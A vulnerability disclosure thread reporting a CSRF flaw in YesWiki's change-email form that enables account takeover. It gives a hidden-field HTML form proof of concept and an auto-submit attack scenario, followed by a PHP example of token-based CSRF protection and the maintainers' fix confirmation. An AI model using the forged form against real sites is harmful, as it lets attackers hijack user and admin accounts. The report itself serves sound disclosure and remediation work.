Cross-Site Request Forgery (CSRF) in yeswiki/yeswiki

Reported on Dec 6th 2021

Hey all,

So I found that YesWiki doesn't implement any sort of anti-CSRF mechanism; I found that the change-email function is vulnerable to CSRF attacks, which leads to Account Takeover.

Proof of Concept

    <form method="POST" action="">
      <input type="hidden" name="usersettings_action" value="update"/>
      <input type="hidden" name="email" value=""/>
      <input type="hidden" name="revisioncount" value="20"/>
      <input type="submit" value="Submit">
    </form>

Exploitation Scenario:

  • An attacker sends the above PoC to the victim.

  • Rather than submit, the autosubmit attribute could be implemented, so the victim's email will be changed and he will be redirected to a third site.

  • An attacker now will reset his password via the changed email and will be able to take over the account.

NOTE: the attack could be applied to the admin account user, which could be harmful to other users, leading to a compromise of their confidentiality, integrity and availability.

Remediation Actions:

Implementing an anti-CSRF mechanism and/or anti-CSRF header with server-side checks should be sufficient to resolve the root cause of the issue.


Taking over user accounts.

Best Regards,

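The remediation the report recommends is the synchronizer-token pattern: the server issues an unguessable per-session token when it renders the settings form, embeds it as a hidden field, and refuses any POST that does not carry a matching token. The following is an added example written for this page to illustrate that check; it is not YesWiki's code and does not reproduce the fix merged in f72309. The function names (csrf_token_issue, csrf_token_check, csrf_hidden_field, handle_usersettings), the hidden-field name csrf_token, and the simulated session array are assumptions made so the snippet runs from the PHP CLI without a web server.

```php
<?php
// Added example, not YesWiki's code: synchronizer-token CSRF protection for a
// form handler like the user-settings "update" action described in the report.
// Function names and the csrf_token field name are hypothetical; the PHP session
// is simulated with an array so this runs from the command line.

declare(strict_types=1);

const CSRF_SESSION_KEY = 'csrf_tokens';
const CSRF_TOKEN_TTL   = 3600; // token lifetime in seconds

/** Issue a fresh per-form token and store it (with its expiry) in the session. */
function csrf_token_issue(array &$session, string $formId): string
{
    $token = bin2hex(random_bytes(32)); // 256 bits from a CSPRNG, hex-encoded
    $session[CSRF_SESSION_KEY][$formId] = [
        'value'   => $token,
        'expires' => time() + CSRF_TOKEN_TTL,
    ];
    return $token;
}

/** Validate and consume the token; true only for an exact, unexpired match. */
function csrf_token_check(array &$session, string $formId, ?string $submitted): bool
{
    $stored = $session[CSRF_SESSION_KEY][$formId] ?? null;
    // Consume the token on every attempt so a failed one cannot be replayed.
    unset($session[CSRF_SESSION_KEY][$formId]);

    if ($stored === null || $submitted === null) {
        return false;
    }
    if ($stored['expires'] < time()) {
        return false;
    }
    // Constant-time comparison avoids leaking how many leading bytes matched.
    return hash_equals($stored['value'], $submitted);
}

/** Render the hidden field that belongs inside the settings form. */
function csrf_hidden_field(string $token): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars($token, ENT_QUOTES, 'UTF-8') . '"/>';
}

/**
 * Simulated handler for the user-settings POST. The e-mail changes only when
 * the request carries a valid token; otherwise the request is rejected.
 */
function handle_usersettings(array &$session, array $post, string $currentEmail): array
{
    if (($post['usersettings_action'] ?? '') !== 'update') {
        return ['status' => 'ignored', 'email' => $currentEmail];
    }
    if (!csrf_token_check($session, 'usersettings', $post['csrf_token'] ?? null)) {
        return ['status' => 'rejected', 'email' => $currentEmail];
    }
    $newEmail = filter_var($post['email'] ?? '', FILTER_VALIDATE_EMAIL);
    if ($newEmail === false) {
        return ['status' => 'invalid_email', 'email' => $currentEmail];
    }
    return ['status' => 'updated', 'email' => $newEmail];
}

// --- demonstration with a simulated session and constructed sample values ---
$session = [];

// 1. Rendering the legitimate form issues a token and embeds it as a hidden field.
$token = csrf_token_issue($session, 'usersettings');
echo csrf_hidden_field($token), PHP_EOL;

// 2. A cross-site form cannot read the victim's token, so it arrives without one.
$forged = ['usersettings_action' => 'update', 'email' => 'other@example.invalid', 'revisioncount' => '20'];
$r = handle_usersettings($session, $forged, 'alice@example.invalid');
echo "forged request: {$r['status']}, email stays {$r['email']}", PHP_EOL;

// 3. The failed attempt consumed the token; the genuine form gets a fresh one.
$token = csrf_token_issue($session, 'usersettings');
$genuine = $forged + ['csrf_token' => $token];
$genuine['email'] = 'alice.new@example.invalid';
$r = handle_usersettings($session, $genuine, 'alice@example.invalid');
echo "genuine request: {$r['status']}, email now {$r['email']}", PHP_EOL;
```

Two design choices worth noting: the token is consumed on every check, including failed ones, so a rejected request cannot be retried against the same value, and the comparison uses hash_equals rather than `===` so timing does not reveal partial matches. A per-form key (here 'usersettings') lets each sensitive form carry its own token instead of one shared session-wide value.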

We are processing your report and will contact the yeswiki team within 24 hours. 6 months ago
Moad Akhraz
6 months ago


Hey @maintainer, we can work on a fix if you want; please ping me using @researcher.
We have contacted a member of the yeswiki team and are waiting to hear back 6 months ago
We have sent a follow up to the yeswiki team. We will try again in 7 days. 6 months ago
Jérémy Dufraisse validated this vulnerability 6 months ago
Moad Akhraz has been awarded the disclosure bounty
The fix bounty is now up for grabs
Moad Akhraz
6 months ago


Hey @admin, I think that a CSRF that leads to Account Takeover deserves more than $5??

Jamie Slome
5 months ago


Hello @mdakh404, I would recommend creating an issue on our public roadmap where you can share your thoughts!

Moad Akhraz
5 months ago


Hello @j9rem, can you please deploy a fix for this one?

Jérémy Dufraisse confirmed that a fix has been merged on f72309 3 months ago
Jérémy Dufraisse has been awarded the fix bounty
usersettings.php#L119-L127 has been validated